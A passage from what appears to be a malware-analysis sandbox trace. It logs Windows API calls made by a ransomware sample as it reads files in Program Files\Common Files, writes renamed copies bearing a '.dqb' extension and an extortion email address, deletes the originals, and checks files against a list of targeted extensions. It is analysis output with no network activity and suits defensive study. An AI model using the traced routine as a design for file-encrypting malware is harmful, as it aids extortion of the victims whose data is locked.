Shared\\THEMES14\\WATER\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0046.563] GetLastError () returned 0x0 [0046.563] ReadFile (in: hFile=0x214, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0xa6c, lpOverlapped=0x0) returned 1 [0046.565] WriteFile (in: hFile=0x1dc, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xa70, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xa70, lpOverlapped=0x0) returned 1 [0046.566] ReadFile (in: hFile=0x214, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.566] WriteFile (in: hFile=0x1dc, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.566] SetEndOfFile (hFile=0x1dc) returned 1 [0046.566] CloseHandle (hObject=0x1dc) returned 1 [0046.566] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.566] SetEndOfFile (hFile=0x214) returned 1 [0046.567] CloseHandle (hObject=0x214) returned 1 [0046.567] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0046.567] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif")) returned 1 [0046.567] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0046.567] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0046.567] lstrlenW (lpString=".doc") returned 4 [0046.567] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.567] lstrlenW (lpString=".docx") returned 5 [0046.567] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.567] lstrlenW (lpString=".pdf") returned 4 [0046.567] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.568] lstrlenW (lpString=".xls") returned 4 [0046.568] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.568] lstrlenW (lpString=".xlsx") returned 5 [0046.568] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.568] lstrlenW (lpString=".ppt") returned 4 [0046.568] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.568] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0046.568] lstrlenW (lpString=".zip") returned 4 [0046.568] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.568] lstrlenW (lpString=".rar") returned 4 [0046.568] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.568] lstrlenW (lpString=".bz2") returned 4 [0046.568] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.568] lstrlenW (lpString=".7z") returned 3 [0046.568] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.568] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0046.568] lstrlenW (lpString=".dbf") returned 4 [0046.568] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.568] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0046.568] lstrlenW (lpString=".1cd") returned 4 [0046.568] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.568] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0046.568] lstrlenW (lpString=".jpg") returned 4 [0046.568] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.568] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0046.568] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0046.568] lstrlenW (lpString=".doc") returned 4 [0046.568] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.568] lstrlenW (lpString=".docx") returned 5 [0046.568] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.568] lstrlenW (lpString=".pdf") returned 4 [0046.568] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.568] lstrlenW (lpString=".xls") returned 4 [0046.568] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.568] lstrlenW (lpString=".xlsx") returned 5 [0046.569] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.569] lstrlenW (lpString=".ppt") returned 4 [0046.569] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.569] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0046.569] lstrlenW (lpString=".zip") returned 4 [0046.569] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.569] lstrlenW (lpString=".rar") returned 4 [0046.569] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.569] lstrlenW (lpString=".bz2") returned 4 [0046.569] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.569] lstrlenW (lpString=".7z") returned 3 [0046.569] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.569] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0046.569] lstrlenW (lpString=".dbf") returned 4 [0046.569] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.569] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0046.569] lstrlenW (lpString=".1cd") returned 4 [0046.569] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.569] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0046.569] lstrlenW (lpString=".jpg") returned 4 [0046.569] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.569] lstrcmpiW (lpString1=".config", lpString2=".dqb") returned -1 [0046.569] lstrlenW (lpString="VSTOInstaller.config") returned 20 [0046.569] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0046.571] GetFileSizeEx (in: hFile=0x1dc, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=716) returned 1 [0046.571] CloseHandle (hObject=0x1dc) returned 1 [0046.571] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config")) returned 0x20 [0046.571] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0046.571] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0046.571] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.571] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.571] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.571] GetLastError () returned 0x0 [0046.572] ReadFile (in: hFile=0x1dc, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x2cc, lpOverlapped=0x0) returned 1 [0046.573] WriteFile (in: hFile=0x174, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x2d0, lpOverlapped=0x0) returned 1 [0046.574] ReadFile (in: hFile=0x1dc, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.574] WriteFile (in: hFile=0x174, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xfc, lpOverlapped=0x0) returned 1 [0046.574] SetEndOfFile (hFile=0x174) returned 1 [0046.574] CloseHandle (hObject=0x174) returned 1 [0046.575] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.575] SetEndOfFile (hFile=0x1dc) returned 1 [0046.575] CloseHandle (hObject=0x1dc) returned 1 [0046.575] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0046.576] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config")) returned 1 [0046.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0046.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0046.576] lstrlenW (lpString=".doc") returned 4 [0046.576] lstrcmpiW (lpString1=".doc", lpString2="nfig") returned -1 [0046.576] lstrlenW (lpString=".docx") returned 5 [0046.576] lstrcmpiW (lpString1=".docx", lpString2="onfig") returned -1 [0046.576] lstrlenW (lpString=".pdf") returned 4 [0046.576] lstrcmpiW (lpString1=".pdf", lpString2="nfig") returned -1 [0046.576] lstrlenW (lpString=".xls") returned 4 [0046.576] lstrcmpiW (lpString1=".xls", lpString2="nfig") returned -1 [0046.576] lstrlenW (lpString=".xlsx") returned 5 [0046.576] lstrcmpiW (lpString1=".xlsx", lpString2="onfig") returned -1 [0046.576] lstrlenW (lpString=".ppt") returned 4 [0046.576] lstrcmpiW (lpString1=".ppt", lpString2="nfig") returned -1 [0046.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0046.576] lstrlenW (lpString=".zip") returned 4 [0046.576] lstrcmpiW (lpString1=".zip", lpString2="nfig") returned -1 [0046.576] lstrlenW (lpString=".rar") returned 4 [0046.576] lstrcmpiW (lpString1=".rar", lpString2="nfig") returned -1 [0046.576] lstrlenW (lpString=".bz2") returned 4 [0046.576] lstrcmpiW (lpString1=".bz2", lpString2="nfig") returned -1 [0046.576] lstrlenW (lpString=".7z") returned 3 [0046.576] lstrcmpiW (lpString1=".7z", lpString2="fig") returned -1 [0046.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0046.576] lstrlenW (lpString=".dbf") returned 4 [0046.576] lstrcmpiW (lpString1=".dbf", lpString2="nfig") returned -1 [0046.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0046.577] lstrlenW (lpString=".1cd") returned 4 [0046.577] lstrcmpiW (lpString1=".1cd", lpString2="nfig") returned -1 [0046.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0046.577] lstrlenW (lpString=".jpg") returned 4 [0046.577] lstrcmpiW (lpString1=".jpg", lpString2="nfig") returned -1 [0046.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0046.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0046.577] lstrlenW (lpString=".doc") returned 4 [0046.577] lstrcmpiW (lpString1=".doc", lpString2="nfig") returned -1 [0046.577] lstrlenW (lpString=".docx") returned 5 [0046.577] lstrcmpiW (lpString1=".docx", lpString2="onfig") returned -1 [0046.577] lstrlenW (lpString=".pdf") returned 4 [0046.577] lstrcmpiW (lpString1=".pdf", lpString2="nfig") returned -1 [0046.577] lstrlenW (lpString=".xls") returned 4 [0046.577] lstrcmpiW (lpString1=".xls", lpString2="nfig") returned -1 [0046.577] lstrlenW (lpString=".xlsx") returned 5 [0046.577] lstrcmpiW (lpString1=".xlsx", lpString2="onfig") returned -1 [0046.577] lstrlenW (lpString=".ppt") returned 4 [0046.577] lstrcmpiW (lpString1=".ppt", lpString2="nfig") returned -1 [0046.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0046.577] lstrlenW (lpString=".zip") returned 4 [0046.577] lstrcmpiW (lpString1=".zip", lpString2="nfig") returned -1 [0046.577] lstrlenW (lpString=".rar") returned 4 [0046.577] lstrcmpiW (lpString1=".rar", lpString2="nfig") returned -1 [0046.577] lstrlenW (lpString=".bz2") returned 4 [0046.577] lstrcmpiW (lpString1=".bz2", lpString2="nfig") returned -1 [0046.577] lstrlenW (lpString=".7z") returned 3 [0046.577] lstrcmpiW (lpString1=".7z", lpString2="fig") returned -1 [0046.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0046.577] lstrlenW (lpString=".dbf") returned 4 [0046.577] lstrcmpiW (lpString1=".dbf", lpString2="nfig") returned -1 [0046.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0046.577] lstrlenW (lpString=".1cd") returned 4 [0046.577] lstrcmpiW (lpString1=".1cd", lpString2="nfig") returned -1 [0046.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0046.577] lstrlenW (lpString=".jpg") returned 4 [0046.578] lstrcmpiW (lpString1=".jpg", lpString2="nfig") returned -1 [0046.578] lstrcmpiW (lpString1=".MSG", lpString2=".dqb") returned 1 [0046.578] lstrlenW (lpString="FPEXT.MSG") returned 9 [0046.578] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0046.578] GetFileSizeEx (in: hFile=0x1dc, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=169637) returned 1 [0046.578] CloseHandle (hObject=0x1dc) returned 1 [0046.578] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg")) returned 0x20 [0046.578] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0046.578] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0046.579] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.579] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.579] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.579] GetLastError () returned 0x0 [0046.579] ReadFile (in: hFile=0x1dc, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x296a5, lpOverlapped=0x0) returned 1 [0046.584] WriteFile (in: hFile=0x174, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x296b0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x296b0, lpOverlapped=0x0) returned 1 [0046.587] ReadFile (in: hFile=0x1dc, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.588] WriteFile (in: hFile=0x174, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0046.588] SetEndOfFile (hFile=0x174) returned 1 [0046.588] CloseHandle (hObject=0x174) returned 1 [0046.588] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.588] SetEndOfFile (hFile=0x1dc) returned 1 [0046.590] CloseHandle (hObject=0x1dc) returned 1 [0046.590] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0046.590] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg")) returned 1 [0046.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0046.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0046.590] lstrlenW (lpString=".doc") returned 4 [0046.590] lstrcmpiW (lpString1=".doc", lpString2=".MSG") returned -1 [0046.590] lstrlenW (lpString=".docx") returned 5 [0046.590] lstrcmpiW (lpString1=".docx", lpString2="T.MSG") returned -1 [0046.590] lstrlenW (lpString=".pdf") returned 4 [0046.590] lstrcmpiW (lpString1=".pdf", lpString2=".MSG") returned 1 [0046.590] lstrlenW (lpString=".xls") returned 4 [0046.590] lstrcmpiW (lpString1=".xls", lpString2=".MSG") returned 1 [0046.590] lstrlenW (lpString=".xlsx") returned 5 [0046.590] lstrcmpiW (lpString1=".xlsx", lpString2="T.MSG") returned -1 [0046.590] lstrlenW (lpString=".ppt") returned 4 [0046.590] lstrcmpiW (lpString1=".ppt", lpString2=".MSG") returned 1 [0046.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0046.590] lstrlenW (lpString=".zip") returned 4 [0046.590] lstrcmpiW (lpString1=".zip", lpString2=".MSG") returned 1 [0046.591] lstrlenW (lpString=".rar") returned 4 [0046.591] lstrcmpiW (lpString1=".rar", lpString2=".MSG") returned 1 [0046.591] lstrlenW (lpString=".bz2") returned 4 [0046.591] lstrcmpiW (lpString1=".bz2", lpString2=".MSG") returned -1 [0046.591] lstrlenW (lpString=".7z") returned 3 [0046.591] lstrcmpiW (lpString1=".7z", lpString2="MSG") returned -1 [0046.591] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0046.591] lstrlenW (lpString=".dbf") returned 4 [0046.591] lstrcmpiW (lpString1=".dbf", lpString2=".MSG") returned -1 [0046.591] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0046.591] lstrlenW (lpString=".1cd") returned 4 [0046.591] lstrcmpiW (lpString1=".1cd", lpString2=".MSG") returned -1 [0046.591] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0046.591] lstrlenW (lpString=".jpg") returned 4 [0046.591] lstrcmpiW (lpString1=".jpg", lpString2=".MSG") returned -1 [0046.591] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0046.591] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0046.591] lstrlenW (lpString=".doc") returned 4 [0046.591] lstrcmpiW (lpString1=".doc", lpString2=".MSG") returned -1 [0046.591] lstrlenW (lpString=".docx") returned 5 [0046.591] lstrcmpiW (lpString1=".docx", lpString2="T.MSG") returned -1 [0046.591] lstrlenW (lpString=".pdf") returned 4 [0046.591] lstrcmpiW (lpString1=".pdf", lpString2=".MSG") returned 1 [0046.591] lstrlenW (lpString=".xls") returned 4 [0046.591] lstrcmpiW (lpString1=".xls", lpString2=".MSG") returned 1 [0046.591] lstrlenW (lpString=".xlsx") returned 5 [0046.591] lstrcmpiW (lpString1=".xlsx", lpString2="T.MSG") returned -1 [0046.591] lstrlenW (lpString=".ppt") returned 4 [0046.591] lstrcmpiW (lpString1=".ppt", lpString2=".MSG") returned 1 [0046.591] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0046.591] lstrlenW (lpString=".zip") returned 4 [0046.591] lstrcmpiW (lpString1=".zip", lpString2=".MSG") returned 1 [0046.591] lstrlenW (lpString=".rar") returned 4 [0046.591] lstrcmpiW (lpString1=".rar", lpString2=".MSG") returned 1 [0046.591] lstrlenW (lpString=".bz2") returned 4 [0046.592] lstrcmpiW (lpString1=".bz2", lpString2=".MSG") returned -1 [0046.592] lstrlenW (lpString=".7z") returned 3 [0046.592] lstrcmpiW (lpString1=".7z", lpString2="MSG") returned -1 [0046.592] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0046.592] lstrlenW (lpString=".dbf") returned 4 [0046.592] lstrcmpiW (lpString1=".dbf", lpString2=".MSG") returned -1 [0046.592] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0046.592] lstrlenW (lpString=".1cd") returned 4 [0046.592] lstrcmpiW (lpString1=".1cd", lpString2=".MSG") returned -1 [0046.592] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0046.592] lstrlenW (lpString=".jpg") returned 4 [0046.592] lstrcmpiW (lpString1=".jpg", lpString2=".MSG") returned -1 [0046.592] lstrcmpiW (lpString1=".bmp", lpString2=".dqb") returned -1 [0046.592] lstrlenW (lpString="verisign.bmp") returned 12 [0046.592] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0046.593] GetFileSizeEx (in: hFile=0x1dc, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=2702) returned 1 [0046.593] CloseHandle (hObject=0x1dc) returned 1 [0046.593] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp")) returned 0x20 [0046.593] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\services\\verisign.bmp.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0046.593] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.593] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0046.593] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0046.593] lstrlenW (lpString=".doc") returned 4 [0046.593] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0046.593] lstrlenW (lpString=".docx") returned 5 [0046.593] lstrcmpiW (lpString1=".docx", lpString2="n.bmp") returned -1 [0046.593] lstrlenW (lpString=".pdf") returned 4 [0046.593] lstrcmpiW 